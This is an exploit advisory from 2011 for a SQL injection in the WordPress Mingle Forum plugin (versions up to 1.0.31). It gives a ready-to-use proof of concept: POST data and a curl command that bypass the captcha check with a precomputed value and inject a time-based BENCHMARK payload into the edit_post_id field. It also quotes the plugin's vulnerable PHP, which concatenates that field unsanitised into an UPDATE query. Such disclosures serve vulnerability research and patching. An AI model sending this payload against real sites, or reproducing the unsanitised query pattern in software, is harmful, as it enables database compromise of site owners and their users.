# Exploit Title: WordPress Mingle Forum plugin <= 1.0.31 SQL Injection Vulnerability
# Date: 2011-09-19
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/mingle-forum.1.0.31.zip
# Version: 1.0.31 (tested)
# Note: wpf_str_encrypt($_POST['wpf_security_code']) == $_POST['wpf_security_check']
---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php
wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
e.g.
curl --data "wpf_security_check=MhWNow%3D%3D&wpf_security_code=fail&edit_post_submit=1&message=test&edit_post_subject=test&thread_id=1&edit_post_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" http://www.site.com/wp-content/plugins/mingle-forum/wpf-insert.php
---------------
Vulnerable code
---------------
if (!isset($_POST['edit_post_submit'])) {
$errormsg = apply_filters('wpwf_check_guestinfo',"");
if ($errormsg != "") {
$error = true;
wp_die($errormsg);
}
}
if($options['forum_captcha'] == true && !$user_ID){
include_once(WPFPATH."captcha/shared.php");
$wpf_code = wpf_str_decrypt($_POST['wpf_security_check']); // wpf_str_decrypt("MhWNow==") == "fail"
if(($wpf_code == $_POST['wpf_security_code']) && (!empty($wpf_code))) {
// do nothing
}
else {
$error = true;
$msg = __("Security code does not match", "mingleforum");
wp_die($msg);
}
}
...
if(isset($_POST['edit_post_submit'])){
$myReplaceSub = array("'", "\\");
$subject = str_replace($myReplaceSub, "", $mingleforum->input_filter($_POST['edit_post_subject']));
$content = $mingleforum->input_filter($_POST['message']);
$thread = $mingleforum->check_parms($_POST['thread_id']);
$edit_post_id = $_POST['edit_post_id'];
if($subject == ""){
$msg .= "<h2>".__("An error occured", "mingleforum")."</h2>";
$msg .= ("<div id='error'><p>".__("You must enter a subject", "mingleforum")."</p></div>");
$error = true;
}
elseif($content == ""){
$msg .= "<h2>".__("An error occured", "mingleforum")."</h2>";
$msg .= ("<div id='error'><p>".__("You must enter a message", "mingleforum")."</p></div>");
$error = true;
}
if ($error) wp_die($msg);
//SECURITY FIX NEEDED <-- actual author's comment :)
$sql = ("UPDATE $mingleforum->t_posts SET text = '$content', subject = '$subject' WHERE id = $edit_post_id");
$wpdb->query($wpdb->prepare($sql)); // misusage of prepare statement(s)